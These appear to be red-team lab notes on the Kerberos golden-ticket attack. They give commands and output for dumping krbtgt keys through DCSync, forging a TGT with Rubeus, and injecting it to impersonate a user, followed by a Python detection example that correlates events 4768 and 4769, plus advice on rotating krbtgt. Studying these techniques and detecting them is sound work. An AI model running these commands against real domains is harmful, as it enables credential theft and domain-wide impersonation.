Golden Tickets

A "golden ticket" is a forged TGT, signed with the key of the domain's krbtgt account. The krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain, which is why you see it used in DCSync examples so frequently.

Obtain KRBTGT secrets

(from DC)

dcsync dev.cyberbotic.io DEV\krbtgt

Primary:Kerberos-Newer-Keys
  Default Salt : DEV.CYBERBOTIC.IOkrbtgt
  Default Iterations : 4096
  Credentials
    aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
    aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
    des_cbc_md5       (4096) : 629189372a372fda

Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

[+] ProcessID       : 5060

steal_token 5060
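Because a golden ticket is built offline and never issued by the KDC, no event 4768 (TGT issued) is ever logged for it, yet the forged TGT still produces 4769 (service ticket requested) events when it is used. The correlation below is an added detection example, not part of the original notes; the log format, the flattened key=value lines and the sample events are constructed, though the field names (EventID, TargetUserName, IpAddress) are the real 4768/4769 fields.

```python
# Added example (not from the original notes): flag service-ticket requests
# (event 4769) whose TGT was never issued by the KDC (no matching 4768).
from datetime import datetime, timedelta

# Constructed sample lines in a flattened key=value form (not real log data).
SAMPLE_LOG = """\
2024-01-10T09:00:01 EventID=4768 TargetUserName=jking IpAddress=::ffff:10.10.17.25
2024-01-10T09:00:02 EventID=4769 TargetUserName=jking@DEV.CYBERBOTIC.IO IpAddress=::ffff:10.10.17.25
2024-01-10T09:05:30 EventID=4769 TargetUserName=jking@DEV.CYBERBOTIC.IO IpAddress=::ffff:10.10.17.25
2024-01-10T09:30:00 EventID=4769 TargetUserName=nlamb@DEV.CYBERBOTIC.IO IpAddress=::ffff:10.10.17.231
2024-01-10T09:30:05 EventID=4769 TargetUserName=nlamb@DEV.CYBERBOTIC.IO IpAddress=::ffff:10.10.17.231
"""

TGT_MAX_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"


def parse_line(line):
    """Return (time, event_id, user, ip) with user and client address normalised."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    user = kv["TargetUserName"].split("@")[0].lower()   # 4769 logs user@REALM
    ip = kv["IpAddress"]
    if ip.startswith("::ffff:"):                         # IPv4-mapped address
        ip = ip[len("::ffff:"):]
    return datetime.fromisoformat(ts), int(kv["EventID"]), user, ip


def find_tgs_without_tgt(log_text, max_lifetime=TGT_MAX_LIFETIME):
    """Return (user, ip, timestamp) for every 4769 that is not preceded by a 4768
    for the same user/client within max_lifetime."""
    events = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    last_tgt = {}  # (user, ip) -> time of the most recent 4768
    hits = []
    for t, eid, user, ip in events:
        if eid == 4768:
            last_tgt[(user, ip)] = t
        elif eid == 4769:
            issued = last_tgt.get((user, ip))
            if issued is None or t - issued > max_lifetime:
                hits.append((user, ip, t.isoformat()))
    return hits


if __name__ == "__main__":
    for user, ip, ts in find_tgs_without_tgt(SAMPLE_LOG):
        print(f"{ts} TGS request by {user} from {ip} with no TGT issued by the KDC")
```

A TGT can be issued by any DC in the domain, so the 4768/4769 streams of every DC must be merged before correlating, and the lifetime window must match the domain's actual Kerberos policy. Rotating the krbtgt password twice (allowing replication between the changes) invalidates tickets forged with the old key.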
